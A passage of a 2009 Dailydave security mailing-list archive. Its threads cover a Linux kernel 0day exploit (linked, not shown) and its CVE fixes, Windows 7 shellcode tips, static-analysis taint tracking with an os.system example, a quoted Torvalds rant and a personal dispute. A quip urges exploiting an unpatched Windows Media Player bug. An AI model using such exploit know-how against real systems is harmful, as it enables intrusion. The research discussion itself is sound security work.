dcom.upv.es (Jaime Lloret Mauri) Date: Thu, 16 Jul 2009 10:28:51 +0200 Subject: [Dailydave] 1st Call for Posters and Industrial Presentations | ComputationWorld 2009 / Athens-Greece, November 15-20, 2009 Message-ID: <200907160828.n6G8Sp2g013171@smtp.upv.es> INVITATION Please consider to contribute and encourage your team members and fellow scientists to contribute to the following federated events. Thanks for forwarding the information on this Call for Posters and Industrial presentations to those potentially interested to submit. ===== Call for Posters and Industrial Presentations ======= ComputationWorld 2009, November 15-20, 2009 - Athens, Greece see: http://www.iaria.org/conferences2009/ComputationWorld09.html ComputationWorld 2009 is a federated event focusing on advanced topics concerning the areas of computation. The target topics cover future computing techniques (strategies, mechanisms, technologies), service computation (ubiquitous, web services, societal), cognitive support (AI, agents, learning, autonomy), adaptiveness (component/systems, self-features, metrics), creative content technologies, and patterns. Submission (Poster, Industrial presentations) deadline: October 1st, 2009. Acceptance notification: October 15, 2009 Submission form: 12-14 slide deck, free format; they will be posted, post-conference, at www.iaria.org. Submissions must be electronically done using the ?Submit a Paper? button on the entry page of each conference listed below. See a 'very preliminary program'. http://www.iaria.org/conferences2009/FUTURECOMPUTING09.html http://www.iaria.org/conferences2009/ProgramFUTURECOMPUTING09.html The events will feature well known Keynote Speakers: The Tempestuous Future of Computing - Every Cloud Engenders not a Storm by Paul J. Geraci, Director, TSG/DoD, USA Infrastructures and Technologies for Future Computing - Convergence of Bandwidth, Clouds, and Smart Devices by Wolfgang Gentzsch, EU Project DEISA & Board fo Directors OGF Services-- The Next Major Frontier for Research & Innovation by Krishna Singh, President, Service Research & Innovation Institute (SRII) / Strategic Programs Director, Service Science Research, IBM Almaden Research Center EXPERT PANEL: Services Computing: Challenge or Opportunity Moderators: Krishna Singh, IBM / SRII Petre Dini, IARIA / Concordia University A few access free tutorials will be provided for all participants. Scientific papers will be presented in more than 30 regular sessions. Special forum meetings on challenging topics will be organized, late, in the afternoons. We aim at some instructive Poster and Special Industrial presentations to complete the spectrum of topics covered by the events. The events are: >> FUTURE COMPUTING 2009, The First International Conference on Future Computational Technologies and Applications http://www.iaria.org/conferences2009/FUTURECOMPUTING09.html >> SERVICE COMPUTATION 2009, The First International Conferences on Advanced Service Computing http://www.iaria.org/conferences2009/SERVICECOMPUTATION09.html >> COGNITIVE 2009, The First International Conference on Advanced Cognitive Technologies and Applications http://www.iaria.org/conferences2009/COGNITIVE09.html >> ADAPTIVE 2009, The First International Conference on Adaptive and Self-adaptive Systems and Applications http://www.iaria.org/conferences2009/ADAPTIVE09.html >> CONTENT 2009, The First International Conference on Creative Content Technologies http://www.iaria.org/conferences2009/CONTENT09.html >> PATTERNS 2009, The First International Conferences on Pervasive Patterns and Applications http://www.iaria.org/conferences2009/PATTERNS09.html >> SELFTRUST 2009, The First Workshop on Computational Trust for Self-Adaptive Systems http://www.iaria.org/conferences2009/SELFTRUST.html -------------------------------- IARIA Publicity Board ComputationWorld Advisory Committees ------------------------------- From spender at grsecurity.net Thu Jul 16 20:57:36 2009 From: spender at grsecurity.net (Brad Spengler) Date: Thu, 16 Jul 2009 20:57:36 -0400 Subject: [Dailydave] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable Message-ID: <20090717005736.GA25295@grsecurity.net> Title says it all, exploit is at: http://grsecurity.net/~spender/cheddar_bay.tgz Everything is described and explained in the exploit.c file. I exploit a bug that by looking at the source is unexploitable; I defeat the null ptr dereference protection in the kernel on both systems with SELinux and those without. I proceed to disable SELinux/AppArmor/LSM/auditing Exploit works on both 32bit and 64bit kernels. Links to videos of the exploit in action are present in the exploit code. Greets to vendor-sec, -Brad -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090716/197926c3/attachment.pgp From meissner at suse.de Mon Jul 20 06:01:47 2009 From: meissner at suse.de (Marcus Meissner) Date: Mon, 20 Jul 2009 12:01:47 +0200 Subject: [Dailydave] [oss-security] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable In-Reply-To: References: Message-ID: <20090720100147.GB12598@suse.de> On Fri, Jul 17, 2009 at 09:23:03AM +0200, yersinia wrote: > FYI, a Sprengler 0-day against Selinux null ptr dereference. Very Nice > to see in action > > reference ( with youtube link ) > > http://grsecurity.net/~spender/cheddar_bay.tgz Yeah. Some "minor" bugs and one larger one. The Linux folks have meanwhile: - Fixed the actual bug. ;) (CVE-2009-1897) Only affects 2.6.30,2.6.30.1. 2.6.30.2 release soon. - Added -fno-delete-null-pointers to their Makefiles Also in 2.6.30.2 and 2. - fixed the personality - PER_CLEAR_ON_SETTID inheritance issue (CVE-2009-1895) to work around mmap_min_addr protection. Affects 2.6.23-2.6.30.1 2.6.30.2 and 2.6.27.x releases soon. I am not sure about the SELinux policy error he used to exploit the RHEL 5.? Beta. Ciao, Marcus From yersinia.spiros at gmail.com Mon Jul 20 08:32:58 2009 From: yersinia.spiros at gmail.com (yersinia) Date: Mon, 20 Jul 2009 14:32:58 +0200 Subject: [Dailydave] [oss-security] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable In-Reply-To: <20090720100147.GB12598@suse.de> References: <20090720100147.GB12598@suse.de> Message-ID: On Mon, Jul 20, 2009 at 12:01 PM, Marcus Meissner wrote: > On Fri, Jul 17, 2009 at 09:23:03AM +0200, yersinia wrote: > > FYI, a Sprengler 0-day against Selinux null ptr dereference. Very Nice > > to see in action > > > > reference ( with youtube link ) > > > > http://grsecurity.net/~spender/cheddar_bay.tgz > > Yeah. > > Some "minor" bugs and one larger one. > > The Linux folks have meanwhile: > > - Fixed the actual bug. ;) (CVE-2009-1897) > Only affects 2.6.30,2.6.30.1. > > 2.6.30.2 release soon. > > - Added -fno-delete-null-pointers to their Makefiles > > Also in 2.6.30.2 and 2. > > - fixed the personality - PER_CLEAR_ON_SETTID inheritance issue > (CVE-2009-1895) > to work around mmap_min_addr protection. > Affects 2.6.23-2.6.30.1 > > 2.6.30.2 and 2.6.27.x releases soon. > > I am not sure about the SELinux policy error he used to > exploit the RHEL 5.? Beta. > > Ciao, Marcus > This is the answer on this the issue by James Morris, Selinux Kernel Developer http://blog.namei.org/2009/07/18/a-brief-note-on-the-2630-kernel-null-pointer-vulnerability/ Ciao, Elia -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090720/93b33611/attachment.htm From rcs at cert.org Mon Jul 20 09:05:18 2009 From: rcs at cert.org (Robert Seacord) Date: Mon, 20 Jul 2009 09:05:18 -0400 Subject: [Dailydave] As-if Infinitely Ranged Integer Model In-Reply-To: <20090717005736.GA25295@grsecurity.net> References: <20090717005736.GA25295@grsecurity.net> Message-ID: The Secure Coding Initiative at CERT has published a new Technical Note CMU/SEI-2009-TN-023 entitled "As-if Infinitely Ranged Integer Model". Abstract: Integer overflow and wraparound are major causes of software vulnerabilities in the C and C++ programming languages. In this paper we present the as-if infinitely ranged (AIR) integer model, which provides a largely automated mechanism for eliminating integer overflow and integer truncation. The AIR integer model either produces a value equivalent to one that would have been obtained using infinitely ranged integers or results in a runtime constraint violation. Unlike previous integer models, AIR integers do not require precise traps, and consequently do not break or inhibit most existing optimizations. Authors: David Keaton (self) Thomas Plum (Plum Hall Inc.) Robert C. Seacord (SEI/CERT) David Svoboda (SEI/CERT) Alex Volkovitsky (SEI/CERT) Timothy Wilson (SEI/CERT) A PDF Download of this paper is available at: http://www.sei.cmu.edu/publications/documents/09.reports/09tn023.html I would be interested in hearing your opinions on this work, either publically or privately. We are planning on continuing this project, as described by the report. Thanks, rCs ---- Robert C. Seacord Secure Coding Team Lead CERT / Software Engineering Institute Work: +1 412.268.7608 FAX: +1 412.268.6989 From spender at grsecurity.net Mon Jul 20 09:36:52 2009 From: spender at grsecurity.net (Brad Spengler) Date: Mon, 20 Jul 2009 09:36:52 -0400 Subject: [Dailydave] [oss-security] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable In-Reply-To: <20090720100147.GB12598@suse.de> References: <20090720100147.GB12598@suse.de> Message-ID: <20090720133652.GA14021@grsecurity.net> > I am not sure about the SELinux policy error he used to > exploit the RHEL 5.? Beta. It was a default RHEL 5.3 SELinux policy. The same vulnerability from the policy exists in Fedora 10 and 11. I haven't tested anything else, but I imagine lots more are vulnerable (and it doesn't matter what kernel you're running). There will be a CVE for this vulnerability as well. (Really there should have been a CVE for the lack of -fno-delete-null-pointer-checks instead of pretending the only problem was /dev/net/tun. As the commit to add it showed (and at least 10 other commits to the kernel this weekend) lots of other code was affected, so someone not applying a fix for a CVE mentioning only /dev/net/tun because they don't have the code for /dev/net/tun compiled in, is going to be missing out on a number of fixes). -Brad -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090720/e5cd445b/attachment.pgp From yersinia.spiros at gmail.com Wed Jul 22 12:30:39 2009 From: yersinia.spiros at gmail.com (yersinia) Date: Wed, 22 Jul 2009 18:30:39 +0200 Subject: [Dailydave] [oss-security] Re: [oss-security] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable In-Reply-To: References: <20090720100147.GB12598@suse.de> <20090720133652.GA14021@grsecurity.net> Message-ID: On Wed, Jul 22, 2009 at 5:04 PM, Todd Sabin wrote: > spender at grsecurity.net (Brad Spengler) writes: > >> (Really there should have been a CVE for the lack of >> -fno-delete-null-pointer-checks instead of pretending the only problem >> was /dev/net/tun.... > > Just as a side note, it seems like gcc is missing an option, to me. > Okay, it can figure out that some NULL pointer checks seem to be > useless, and either optimize them away or leave them in. What about > issuing a warning? > > Where's -Wuseless-null-pointer-check? > Coverity opinion on this specific issue http://blog.coverity.com/posts/general/would-you-like-to-know-about-0day-defects-months-in-advance Regards > > Todd > > -- > Todd Sabin > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090722/d7000cd1/attachment.htm From dave.aitel at gmail.com Fri Jul 24 01:07:55 2009 From: dave.aitel at gmail.com (Dave Aitel) Date: Fri, 24 Jul 2009 01:07:55 -0400 Subject: [Dailydave] 3am phone calls, intrigue? Say no more! Message-ID: >From http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html: """ "The bug is actually much 'deeper' than most people realize," Flake wrote. "MS might have accidentally introduced security vulnerabilities into third party products." I reached out to Flake for additional information, but he told me that shortly after he published that blog post he received a 3 a.m. phone call from Microsoft asking him please not to comment further. """ Someone needs to stop messing with the Flash bug and own WMP with this tonight! -dave From berendjanwever at gmail.com Sat Jul 25 08:24:01 2009 From: berendjanwever at gmail.com (Berend-Jan Wever) Date: Sat, 25 Jul 2009 14:24:01 +0200 Subject: [Dailydave] So shellcode work is phun In-Reply-To: <4e1ef3e50906300828l6f6d93bcm309ab369242f2a08@mail.gmail.com> References: <4A45108B.5040901@crucialsecurity.com> <4A487051.3030102@redshift.com> <4e1ef3e50906300828l6f6d93bcm309ab369242f2a08@mail.gmail.com> Message-ID: <3fa2f5bb0907250524k1e13e14fxf2fa4f8c6a274e05@mail.gmail.com> If you're not paranoid about blowing stuff up and just want your shellcode to be both small and have a decent chance to work on Windows 7, try this: http://skypher.com/index.php/2009/07/22/shellcode-finding-kernel32-in-windows-7/ (do let me know if that doesn't work on your machine!) Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined On Tue, Jun 30, 2009 at 5:28 PM, Dave Aitel wrote: > So today, in class, at the very end of the day, one of the students go his > bindshell working. And he was connecting to it happily and quite pleased > with himself and checking out his admin cmd.exe in taskmanager until we > pointed out that he should probably bind to localhost instead of 0.0.0.0, at > which point he got super paranoid. :> > > Anyways, one of the things we teach in class is to do error correction in > your shellcode. That jne might cost you 2 bytes of space, but at least that > 1/100th of a time when your bind() fails, you don't have to worry that you > AVed some poor guy's lsass. > > That same thing is true for parsing the PEB and it's mighty linked lists. > If you make assumptions about what order modules are loaded in, then things > are going to blow up eventually. Probably not when you want them too. > > -dave > > > > On Mon, Jun 29, 2009 at 3:42 AM, Chris Eagle wrote: > >> Perhaps relevant: >> >> >> http://www.harmonysecurity.com/blog/2009/06/retrieving-kernel32s-base-address.html >> >> Chris >> >> Jared DeMott wrote: >> > Dear Dave, >> > >> > Just for phun, I sat down to test a simple popup calc shellcode on >> > Windows 7 RC today and it pooped. I verified that it worked on XP and >> > Vista, and thought darn ... now I'm going to have to see why it failed >> > on Windows 7 and email H D Moore. Anyone else seen this or am I on >> > crack today? >> > >> > Cheers, >> > Jared >> > _______________________________________________ >> > Dailydave mailing list >> > Dailydave at lists.immunitysec.com >> > http://lists.immunitysec.com/mailman/listinfo/dailydave >> > >> > >> >> _______________________________________________ >> Dailydave mailing list >> Dailydave at lists.immunitysec.com >> http://lists.immunitysec.com/mailman/listinfo/dailydave >> > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090725/3c1bcb77/attachment-0001.htm From joanna at invisiblethingslab.com Sun Jul 26 09:41:08 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Sun, 26 Jul 2009 06:41:08 -0700 Subject: [Dailydave] Rockstar Wannabe Message-ID: <4A6C5CF4.5080309@invisiblethingslab.com> * 28/05/2009: The Day 0 * 23/06/2009: The 1st Reminder * 29/06/2009: The 2nd Reminder * 29/06/2009: Got an Answer: they cannot do it now, will do it later... * 06/07/2009: The 3rd Reminder * 13/07/2009: The 4th Reminder (expressed confusion about the lack of answer) * 20/07/2009: The 5th Reminder [Yes, you got it right, it's my task manager that keeps me reminding about sending those remainder every week!] * 21/07/2009: Got an Answer: they are too busy now, though :( *21/07/2009: got pissed off a little bit: Date: Tue, 21 Jul 2009 13:11:02 +0200 From: Joanna Rutkowska To: Yuriko Kanamori , Dragos Ruiu Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] Too bad Dragos can find time to update his twitter [1], but cannot even answer my email... So, disappointing :/ joanna. [1] http://twitter.com/dragosr Yuriko Kanamori wrote: > Hi Joanna, > We are in Japan for some work now till end of this month, and has been > crazy busy. > I will ask him to do it once we go back. > Yuriko * 23/07/2009: The Rockstar answered personally: From: Dragos Ruiu To: Joanna Rutkowska Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] Date: Thu, 23 Jul 2009 17:26:40 -0700 That's because i have twitter on my phone here on trains in Tokyo, and I get about a half hour a day in front of my computer with my hectic meeting schedule.. I would also like to offer you a piece of advice that may serve you in other parts of your life: Making me angry is unlikely to hasten my response, as a matter of fact it will do the exact opposite of what you desire. Factoring this into your dealings with others may improve responses to your requests. Usually when someone complains, my response is to put their request back to the bottom of the task queue. Just because I'm a stubborn bastard. Have a nice day. cheers, --dr P.S. your payment was sent out recently because i thought it might be a better use of my limited computer access than responding to your query - but international transfers usually take at least five days, so contact me if it doesn't show up by middle of next week because something went wrong. Some additional facts: * The total amount of money we talk here is less then $500 USD Cheers, joanna. -- Joanna Rutkowska Founder/CEO Invisible Things Lab http://invisiblethingslab.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 227 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090726/196b939e/attachment.pgp From demonic.software at gmail.com Sun Jul 26 14:58:12 2009 From: demonic.software at gmail.com (Demonic Software) Date: Sun, 26 Jul 2009 13:58:12 -0500 Subject: [Dailydave] Rockstar Wannabe In-Reply-To: <4A6C5CF4.5080309@invisiblethingslab.com> References: <4A6C5CF4.5080309@invisiblethingslab.com> Message-ID: I am sure I will regret calling it like it is, but isn't it a little petty to spam a list about less than $500 and your personal dealings with people. Personally, I think this would be below a "Rock Star" of you're stature, but then I have learned in this business that there can be many surprises. Perhaps you should knock the chips off the shoulder and accept that people have priorities that don't include keeping you happy. Just saying.... -Adam On Sun, Jul 26, 2009 at 8:41 AM, Joanna Rutkowska wrote: > * 28/05/2009: The Day 0 > * 23/06/2009: The 1st Reminder > * 29/06/2009: The 2nd Reminder > * 29/06/2009: Got an Answer: they cannot do it now, will do it later... > * 06/07/2009: The 3rd Reminder > * 13/07/2009: The 4th Reminder (expressed confusion about the lack of answer) > * 20/07/2009: The 5th Reminder > [Yes, you got it right, it's my task manager that keeps me reminding about > sending those remainder every week!] > * 21/07/2009: Got an Answer: they are too busy now, though :( > *21/07/2009: got pissed off a little bit: > > > Date: Tue, 21 Jul 2009 13:11:02 +0200 > From: Joanna Rutkowska > To: Yuriko Kanamori , Dragos Ruiu > Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] > > Too bad Dragos can find time to update his twitter [1], but cannot even answer > my email... So, disappointing :/ > > joanna. > > [1] http://twitter.com/dragosr > > Yuriko Kanamori wrote: >> Hi Joanna, >> We are in Japan for some work now till end of this month, and has been >> crazy busy. >> I will ask him to do it once we go back. >> Yuriko > > > > * 23/07/2009: The Rockstar answered personally: > > > From: Dragos Ruiu > To: Joanna Rutkowska > Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] > Date: Thu, 23 Jul 2009 17:26:40 -0700 > > That's because i have twitter on my phone here on ?trains in Tokyo, and I get > about a half hour a day in front of my computer with my hectic meeting schedule.. > > I would also like to offer you a piece of advice that may serve you in other > parts of your life: > > Making me angry is unlikely to hasten my response, as a matter of fact it will > do the exact opposite of what you desire. Factoring this into your dealings with > others may improve responses to your requests. > > Usually when someone complains, my response is to put their request back to the > bottom of the task queue. Just because I'm a stubborn bastard. Have a nice day. > > cheers, > --dr > > P.S. your payment was sent out recently because i thought it might be a better > use of my limited computer access than responding to your query - but > international transfers usually take at least five days, so contact me if it > doesn't show up by middle of next week because something went wrong. > > > > Some additional facts: > * The total amount of money we talk here is less then $500 USD > > Cheers, > joanna. > -- > Joanna Rutkowska > Founder/CEO > Invisible Things Lab > http://invisiblethingslab.com/ > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From meddington at gmail.com Sun Jul 26 16:11:15 2009 From: meddington at gmail.com (Michael Eddington) Date: Sun, 26 Jul 2009 13:11:15 -0700 Subject: [Dailydave] Rockstar Wannabe In-Reply-To: <4A6C5CF4.5080309@invisiblethingslab.com> References: <4A6C5CF4.5080309@invisiblethingslab.com> Message-ID: <2db0cefa0907261311m4280c658nff0efc14ea7ba8dc@mail.gmail.com> Personally I've always found Dragos to be extremely generous in every dealing I've had with him. Something I definitely cannot say about some conferences or people. And while Dragos may operate on a schedule more chaotic then others, well, that's Dragos for yah :) If you are unhappy doing business with Dragos, then don't do any in the future. Perhaps you could also find a more appropriate forum for you complaints (/dev/null comes to mind). mike On Sun, Jul 26, 2009 at 6:41 AM, Joanna Rutkowska wrote: > * 28/05/2009: The Day 0 > * 23/06/2009: The 1st Reminder > * 29/06/2009: The 2nd Reminder > * 29/06/2009: Got an Answer: they cannot do it now, will do it later... > * 06/07/2009: The 3rd Reminder > * 13/07/2009: The 4th Reminder (expressed confusion about the lack of answer) > * 20/07/2009: The 5th Reminder > [Yes, you got it right, it's my task manager that keeps me reminding about > sending those remainder every week!] > * 21/07/2009: Got an Answer: they are too busy now, though :( > *21/07/2009: got pissed off a little bit: > > > Date: Tue, 21 Jul 2009 13:11:02 +0200 > From: Joanna Rutkowska > To: Yuriko Kanamori , Dragos Ruiu > Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] > > Too bad Dragos can find time to update his twitter [1], but cannot even answer > my email... So, disappointing :/ > > joanna. > > [1] http://twitter.com/dragosr > > Yuriko Kanamori wrote: >> Hi Joanna, >> We are in Japan for some work now till end of this month, and has been >> crazy busy. >> I will ask him to do it once we go back. >> Yuriko > > > > * 23/07/2009: The Rockstar answered personally: > > > From: Dragos Ruiu > To: Joanna Rutkowska > Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] > Date: Thu, 23 Jul 2009 17:26:40 -0700 > > That's because i have twitter on my phone here on ?trains in Tokyo, and I get > about a half hour a day in front of my computer with my hectic meeting schedule.. > > I would also like to offer you a piece of advice that may serve you in other > parts of your life: > > Making me angry is unlikely to hasten my response, as a matter of fact it will > do the exact opposite of what you desire. Factoring this into your dealings with > others may improve responses to your requests. > > Usually when someone complains, my response is to put their request back to the > bottom of the task queue. Just because I'm a stubborn bastard. Have a nice day. > > cheers, > --dr > > P.S. your payment was sent out recently because i thought it might be a better > use of my limited computer access than responding to your query - but > international transfers usually take at least five days, so contact me if it > doesn't show up by middle of next week because something went wrong. > > > > Some additional facts: > * The total amount of money we talk here is less then $500 USD > > Cheers, > joanna. > -- > Joanna Rutkowska > Founder/CEO > Invisible Things Lab > http://invisiblethingslab.com/ > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From dave at immunityinc.com Mon Jul 27 16:05:41 2009 From: dave at immunityinc.com (dave) Date: Mon, 27 Jul 2009 16:05:41 -0400 Subject: [Dailydave] Static Analysis part 5 Message-ID: <4A6E0895.7020600@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 If you haven't read it yet (and you like to read things), this is worth reading: http://samate.nist.gov/docs/NIST_Special_Publication_500-279.pdf There's a lot of meta-questions here, like "What sorts of vulnerabilities can automated techniques really find?" Scalability is hard too. "Can we look at 4500 buffer overflow bugs to triage them?" the paper asks. Many people don't see why it's hard to do static analysis automatically, which I think is always worth thinking about. For example, recently I was at a conference looking at a vendor's implementation of the traditional "data-flow-then-alert-on-tainted-data" algorithm. (As opposed to the "solve-massive-equation-to-understand-data-constraints" style).[1] We were looking at PHP, and I couldn't for the life of me figure out why the system was alerting on a particular code path. I will reproduce it here in python, since my PHP is weak. d={} //DEFINE dictionary d["HI"]=TAINTED_USER_DATA; //insert some tainted data to it, whole dictionary is tainted now. #stuff goes here that is not relevant (we think) os.system(d["BYE"]) //ALERT! It turns out the analysis tool tainted the whole dictionary if any tainted data was inserted into it, because all the other solutions for that are...insanely complex. Maybe one of the static analysis guru's on the list knows of the best way to solve that particular problem and wants to share. (Or maybe there isn't a solution for that problem, and no one wants to point that out either? :>) - -dave [1] Scanner Pong's rules are as follows. You must use the test programs the vendor brings with them to demonstrate their static analysis tool. For each vulnerability you look at you lose 1 point. For each vulnerability you look at that you show to be a false positive, you get 2 points. For each vulnerability you look at where the tool has missed an interesting vulnerability within 30 lines of code you get 5 points. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkpuCJUACgkQtehAhL0gherfQACfavVrp85RJrpJXv4apIip/UwL MMcAnjjBnCA6Zzv+uGYtMrABuoFTc8QI =1QFS -----END PGP SIGNATURE----- From version5 at gmail.com Mon Jul 27 18:06:35 2009 From: version5 at gmail.com (nnp) Date: Mon, 27 Jul 2009 23:06:35 +0100 Subject: [Dailydave] Static Analysis part 5 In-Reply-To: <4A6E0895.7020600@immunityinc.com> References: <4A6E0895.7020600@immunityinc.com> Message-ID: <28749c0e0907271506t78775b66g1591ea15aad68ebd@mail.gmail.com> Err...so they had a PHP specific source code analysis tool *without* support for default language structures (or at least, without useful support)? I'm assuming they parse the source into some sort of AST and then do their analysis on that, so the only justification I could see would be that their AST format didn't have support for something like a dictionary, which seems pretty odd. On the topic of automated analysis, check this out http://klee.llvm.org/. I only just found out it was open source (via the RE reddit [1]). Their paper is linked from that site and it's pretty good. They take the "solve-massive-equation-to-understand-data-constraints" style approach. [1] http://www.reddit.com/r/ReverseEngineering/comments/94xxg/klee_unassisted_and_automatic_generation_of/ On Mon, Jul 27, 2009 at 9:05 PM, dave wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > If you haven't read it yet (and you like to read things), this is worth > reading: > > http://samate.nist.gov/docs/NIST_Special_Publication_500-279.pdf > > There's a lot of meta-questions here, like "What sorts of > vulnerabilities can automated techniques really find?" Scalability is > hard too. "Can we look at 4500 buffer overflow bugs to triage them?" the > paper asks. > > Many people don't see why it's hard to do static analysis automatically, > which I think is always worth thinking about. > > For example, recently I was at a conference looking at a vendor's > implementation of the traditional "data-flow-then-alert-on-tainted-data" > algorithm. (As opposed to the > "solve-massive-equation-to-understand-data-constraints" style).[1] > > We were looking at PHP, and I couldn't for the life of me figure out why > the system was alerting on a particular code path. I will reproduce it > here in python, since my PHP is weak. > > d={} //DEFINE dictionary > d["HI"]=TAINTED_USER_DATA; //insert some tainted data to it, whole > dictionary is tainted now. > #stuff goes here that is not relevant (we think) > os.system(d["BYE"]) //ALERT! > > It turns out the analysis tool tainted the whole dictionary if any > tainted data was inserted into it, because all the other solutions for > that are...insanely complex. Maybe one of the static analysis guru's on > the list knows of the best way to solve that particular problem and > wants to share. (Or maybe there isn't a solution for that problem, and > no one wants to point that out either? :>) > > - -dave > [1] Scanner Pong's rules are as follows. You must use the test programs > the vendor brings with them to demonstrate their static analysis tool. > For each vulnerability you look at you lose 1 point. For each > vulnerability you look at that you show to be a false positive, you get > 2 points. For each vulnerability you look at where the tool has missed > an interesting vulnerability within 30 lines of code you get 5 points. > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (GNU/Linux) > Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org > > iEYEARECAAYFAkpuCJUACgkQtehAhL0gherfQACfavVrp85RJrpJXv4apIip/UwL > MMcAnjjBnCA6Zzv+uGYtMrABuoFTc8QI > =1QFS > -----END PGP SIGNATURE----- > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From pageexec at freemail.hu Mon Jul 27 19:09:40 2009 From: pageexec at freemail.hu (pageexec at freemail.hu) Date: Tue, 28 Jul 2009 01:09:40 +0200 Subject: [Dailydave] Security people are leaches. [sic] Message-ID: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu> really. or at least according to one Linus Torvalds, who also happens to be the primary reason for not one, but two! of this year's pwnie nominations for lamest vendor response and most epic FAIL. apparently the fundamental issue he cannot understand is that if they don't know what bugs are security issues, maybe they should find people who do. or maybe bother reading those static checker reports that point them out. just a thought. also one cannot help but smile at the irony of divineint (put in charge of security at RH, no less ;) asking for more proper disclosure. how times change ;). also i guess exploit writers would heartily disagree with the notion that there's no difference between bugs and security bugs :P. anyway, without further ado, here's the latest masterpiece: On Sun, 19 Jul 2009, Eugene Teo wrote: > > If the upstream development community can start doing their part by > differentiating normal bug fixes to the security ones, I think most of > us will benefit from it. Ok, so this is a perfect example of the kind of IDIOTIC blathering that I hate to hear from security people. Quite frankly, people who state things like that ARE FUCKING MORONS. I'm sorry, but it's true. Learn it. Think about it. Deeply, and long. This who security exploit is a prime example of exactly why anybody who says something stupid like that is so stupid and so WRONG. Look at the bug that caused it. Look at the fix. Think about it. When the fix was committed, nobody thought it was a security bugfix. Really. If you cannot understand this FUNDAMENTAL issue, I don't know what can make you do so. I absolutely despise most security people, because they are idiots who do not understand development. They are idiots who do not understand basic facts. They are idiots, who think the world is some kind of black-and-white place where you can sort bugs into 'security' and 'not security'. So here's a few simple rules: ?- people who argue for full disclosure are wrong ?- people who argue for hiding things and vendor-sec are wrong ?- people who think that there are "bugs" and "security bugs" are ? fundamentaly wrong, and misguided, and will always do the wrong thing. The fact is, bugs are bugs. We don't know which of them are security issues. We all make mistakes, and we _fix_ the mistakes, and some of the fixes turn out to have way more subtle interactions than people even realized! So you can ask developers to "always think of all the possible issues", and you will be left with developers who won't have time or motivation to actually do any real work. And they'll _still_ miss some subtle issue, and they'll _still_ write code that has bugs. So how about people face REALITY instead of talking about idiotic platitudes like people should be "differentiating normal bug fixes to the security ones"? And it _is_ a platitude: it's something that sounds "obviously correct", but it's at the same time clearly ignoring the fact that reality is complicated. So f*ck me, shut up about idiotic things like that already! This whole bug really is a _prime_ example of how the bugfix was not at all clearly a security fix at all, even though it obviously was a big deal. And a security person who cannot understand that is not a security person at all - he's just a f*cking poser. This is why I detest security lists. Lots of posturing and platitudes. And look at who actually did the real work: a regular developer, and a regular maintainer, neither of whom were thinking in terms of security. Security people are leaches. The real heroes are the people who do development. The last thing security people should do is to ask the people who do the REAL WORK to do more. ? ? ? ? ? ? ? ? ? ? ? ?Linus From halvar at gmx.de Mon Jul 27 23:40:23 2009 From: halvar at gmx.de (Halvar Flake) Date: 28 Jul 2009 05:40:23 +0200 Subject: [Dailydave] Static Analysis part 5 In-Reply-To: <4A6E0895.7020600@immunityinc.com> References: <4A6E0895.7020600@immunityinc.com> Message-ID: <4A6E7327.1030805@gmx.de> Tainting / untainting is generally a difficult topic. - If I calculate the length of a tainted string, is the result tainted ? - If I check some boundaries on this string, is the result untainted ? - What if the boundaries I checked for are wrong ? Can of worms, difficult to solve. Cheers, Halvar dave wrote: > If you haven't read it yet (and you like to read things), this is worth > reading: > > http://samate.nist.gov/docs/NIST_Special_Publication_500-279.pdf > > There's a lot of meta-questions here, like "What sorts of > vulnerabilities can automated techniques really find?" Scalability is > hard too. "Can we look at 4500 buffer overflow bugs to triage them?" the > paper asks. > > Many people don't see why it's hard to do static analysis automatically, > which I think is always worth thinking about. > > For example, recently I was at a conference looking at a vendor's > implementation of the traditional "data-flow-then-alert-on-tainted-data" > algorithm. (As 